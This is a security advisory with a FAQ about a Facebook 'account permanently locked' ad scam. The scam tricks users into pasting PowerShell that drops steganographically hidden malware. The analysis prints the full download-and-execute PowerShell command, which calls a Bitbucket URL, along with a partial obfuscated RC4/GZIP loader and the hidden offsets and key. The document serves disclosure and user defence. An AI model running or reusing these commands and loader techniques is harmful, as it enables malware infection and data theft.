What is the Facebook account lockout scam?

The Facebook account lockout scam is a malicious campaign that uses fake Facebook advertisements warning users that their account will be permanently locked. These ads are designed to look like official Facebook support messages and trick users into installing malware on their computers.

How does the Facebook lockout scam work?

The scam starts with a Facebook advertisement that appears to be from Facebook support. When users click on the ad, they are redirected to a fake Facebook support page that instructs them to copy and paste content that appears to be a document. In reality, copying this content executes malicious PowerShell commands that download malware.

How can I identify fake Facebook support messages?

Fake Facebook support messages often create urgency by claiming your account will be locked or suspended immediately. They redirect to recently created domains rather than facebook.com, and ask you to copy and paste suspicious content. Always verify Facebook communications by going directly to facebook.com rather than clicking links.

What happens if I fall for the Facebook scam?

If you copy and paste the content from the fake Facebook support page, you will unknowingly execute PowerShell commands that download malicious software to your computer. This malware can compromise your system, steal personal information, or give attackers control of your device.

What is steganography and how is it used in this scam?

Steganography is a technique of hiding malicious code inside seemingly innocent files like images or audio. In this scam, attackers hide malware inside image files downloaded from code repositories, making it difficult for security scanners and users to detect the malicious content.

How sophisticated is this Facebook scam campaign?

This is a highly sophisticated attack that uses multiple programming languages (Rust, GoLang), advanced obfuscation techniques, steganography to hide code in images, and complex multi-stage payload delivery. The technical complexity suggests it's operated by a well-organized cybercriminal group.

Who discovered and investigated this Facebook scam?

The scam was detected and investigated by the BeyondMachines team on their Discord server, with code analysis prepared by Viktor Ivanovski. The team successfully blocked the malicious repository and reported the campaign to relevant authorities.

What action was taken against the Facebook scam?

The BeyondMachines team reported the scam to Atlassian's Bitbucket team, which removed the repository hosting the malicious script. They also reported it to VirusTotal so multiple antivirus systems and blockers will stop the site and code.

Will blocking this scam stop future attacks?

Blocking this specific campaign disrupts current operations, but attackers will likely create new versions using different URLs and code. The proper defense is to understand the techniques used and learn how to avoid falling for these scam attempts.

What should I do if I think I've been targeted by this Facebook scam?

If you clicked on a suspicious Facebook ad or copied content from a fake support page, immediately run a full antivirus scan, disconnect from the internet, and consider seeking help from a cybersecurity professional. Change your passwords from a clean device and monitor your accounts for suspicious activity.

How can I verify legitimate Facebook communications?

Always verify Facebook communications by going directly to facebook.com and checking your official notifications or support messages. Never click on links in ads or messages claiming to be from Facebook. Legitimate Facebook communications will be available through your official account dashboard.

What are the warning signs of Facebook scams?

Warning signs include urgent language claiming immediate account suspension, requests to copy and paste content, links that don't go to facebook.com, recently created domains, and messages asking for immediate action without proper verification through official Facebook channels.

What malicious files does this Facebook scam install?

The scam downloads and installs executable files (.exe) and dynamic link library files (.dll) to the computer's temporary folder. These files are hidden using advanced encryption and compression techniques, making them difficult for antivirus software to detect initially.

How can I stay safe from Facebook scams?

Don't rush when you see urgent messages, don't trust anything on social media as everything can be faked, question why you're seeing unexpected content, and verify independently by visiting official websites directly rather than clicking links from social media posts or ads.

Should I copy and paste content from Facebook support pages?

Never copy and paste content from any support page, especially if you reached it through a social media ad or link. Legitimate Facebook support will never ask you to copy and paste code or commands. This is a common technique used to execute malicious commands on your computer.

Scam/Phishing

Disabled facebook account campaign tries to get users to install malware

published: Sept. 12, 2025

Take action: Never trust Facebook ads or messages claiming your account will be "permanently locked". Don't rush, think about the issue and consult with people. If you're concerned about your account, go directly to Facebook.com (don't click any links) and check your account status there instead.

Learn More

A scam campaign was detected on Facebook that attempts to lure users into installing malware on their computer under the guise of "account is going to be permanently locked"

The scam was detected and components of the scam were disabled and investigated by the BeyondMachines team on our Discord server. The code analysis was prepared by Viktor Ivanovski, who is also co-authoring this report.

We managed to block the repository that stored the malicious code, which should hamper that campaign, but other versions of the same campaign will crop up again. The proper defense is to understand the techniques and avoid the scam attempt.

Massive thanks to all reporters, responders and researchers on this effort.

The scam starts as an advertisement in Facebook that's designed to look like a message from support warning that "the account will be permanently locked" and what appears to be a link to Facebook.com. The text on the advertisement is not the real link.

If a user clicks on the advertisement, they are led to a completely irrelevant domain that renders a fake Facebook support screen. The screen guides the user to apparently copy "a document" and then paste the content into a file explorer. In reality, if the user clicks "Copy" they will receive a powershell commands that downloads the next stage of the malicious loader.

This domain was created just 16 days ago, so it's definitely not a support site of Facebook.

This is the initial powershell script:

powershell.exe -noP -W H -ep Bypass -C "$p_fist_x=-join($env:TEMP,'\pexels-karinarymarchuk.ps1');Invoke-WebRequest -Uri 'https://bitbucket.org/bounnapecragro/pexels/raw/a4df8d041985c1e2ec86108d844770b46185c88f/pexels-karinarymarchuk.pfx' -Method Get -OutFile $p_fist_x -ErrorAction Ignore;&($p_fist_x);$__xTrust='\Users\Default\Documents\Meta\Facebook\Shared\Incident_reported.pdf'"

The attack sequence is:

Run the powershell command, which loads the script from a bitbucket.org repository (a site that stores code)

The loaded script from bitbucket loads an image from a bitbucket.org repository, and then extracts a hidden piece of code in the image file.

The technique of hiding code in images is known as steganography. It's designed to hide code in places where people and automated scanners won't check for program code. Audio and image files are prime candidates.

The code was also heavily obfuscated to hide what it does, used jumps and concatenation of strings to hide the actual code.

An intentionally incomplete example of the obfuscated code:
fa4eb9{param($k,$d)$o=New-Object byte[] $d.Length;$s=0..255;$j=0;for($i=0;$i-lt256;$i++){$j=($j+$s[$i]+$k[$i%$k.Length])%256;$s[$i],$s[$j]=$s[$j],$s[$i]}$i=$j=0;for($c=0;$c-lt$d.Length;$c++){$i=($i+1)%256;$j=($j+$s[$i])%256;$s[$i],$s[$j]=$s[$j],$s[$i];$o[$c]=$d[$c]-bxor$s[($s[$i]+$s[$j])%256]}$o};
function f3db93($b){$m=[IO.MemoryStream]::new();$g=[IO.Compression.GZipStream]::new([IO.MemoryStream]::new($b),[IO.Compression.CompressionMode]::Decompress);$g.CopyTo($m);$g.Close();$m.ToArray()};$key=$cf.Invoke('ejEzZWFmY2VlMjgz');$index=$egs.Invoke($cf.Invoke('ODQzODYuMzIwNjkyLjMyMDcwNC4zMjA3MDguMTk4MjU1My4xOTgyNTY1LjE5ODI1Njk=')) -split '\.' | ForEach-Object { [int]$_ };$exe_list_path = @();$dll_list_path = @();
for($i=1;$i-lt$index.Length;$i+=3) {
 $zero_bytes = $image_bytes[$index[$i-1]..($index[$i]-1)];
 $one_bytes=fa4eb9 $key $zero_bytes;
 $two_bytes=f3db93 $one_bytes;
 $basename_bytes = $image_bytes[$index[$i]..($index[$i+1]-1)];
 $extension_bytes = $image_bytes[$index[$i+1]..($index[$i+2]-1)];
 $drop_path = -join($env:TEMP,'\',$e.GetString($basename_bytes),$e.GetString($extension_bytes));

Specific parts of the image are used to craft the next steps:
1. Size discrepancy:
  1. The size of the original image on Pexels is 1.058 KB.
  2. The size of the malicious image on Bitbucket is 1984.099 KB.
  3. Magic numbers hidden as a base64 hardcoded payload: (ODQzODYuMzIwNjkyLjMyMDcwNC4zMjA3MDguMTk4MjU1My4xOTgyNTY1LjE5ODI1Njk=)
    84386, 320692, 320704, 320708, 1982553, 1982565, 1982569
  4. Within the first 84386 bytes is a script that contains 2 specific functions:
    1. RC4 Stream Cypher https://en.wikipedia.org/wiki/RC4
    2. GZIP Decompression https://en.wikipedia.org/wiki/Gzip
    3. Additionally, it contains the bulk of the payload used.
  5. The filename stored in range 320692 - 320704 is sized 12 bytes (zc1ed5138ec9) with extension in range 320704 - 320708 sized 4 bytes (.exe)
  6. The filename stored in range 1982553 - 1982565 is sized 12 bytes (vcruntime140) with extension in range 1982565- 1982569 sized 4 bytes (.dll)
  7. Both payloads are then converted back to their original values using RC4 with a hardcoded key ejEzZWFmY2VlMjgz (base64 decoded to z13eafcee283) then GZIP decompressed.
  8. Then they are stored on the file system in the TEMP folder.
  9. Finally, the .exe is being executed using Windows's cmd.exe and a message is displayed to the victim: “Cannot open File”.

The malicious image (resampled so the malicious part is destroyed)

The end goal of the binaries are still under review, here are some few takeaways from the initial information we’ve gathered:

The malicious binary contains references to Rust/Cargo https://crates.io/, Cursor https://cursor.com/ and Inno Setup https://jrsoftware.org/isdl.php
The malicious dll contains references to GoLang https://go.dev/

While there were no identifiers defined as to who is behind this attack, the complex techniques and multiple languages used to perform this attack point to the attackers being very well prepared to hide in plain sight. It indicates a well organized crime group.

After the discovery, the BeyondMachines team reported it to Atlasian’s Bitbuckets team which removed the repository which was hosting the malicious script. Until the attackers update the Facebook AD to use a different URL and code, it disrupts their operations.

We also reported it to VirusTotal so multiple Antivirus systems and blockers will stop the site and code.

How to stay safe?

Don't rush! Nothing is that urgent - especially if it implies that it's urgent
Don't trust ANYTHING ON SOCIAL MEDIA - everything can be faked.
Don't trust anything that's put in front of you - If you didn't ask for something, ask yourself why are you seeing it.
Verify independently - NEVER click on links or call numbers put in front of you on social media. Call or visit the official site separately, never from the link

Disabled facebook account campaign tries to get users to install malware

Read More
Criminals use TikTok videos to promise pirated apps, …
Threat group Educated Manticore targets academia and cybersecurity …
Online marketplace fake overpayment (payment hold) scam
Phishing attack impersonating Coinbase
Cloud storage "payment failed" phishing attack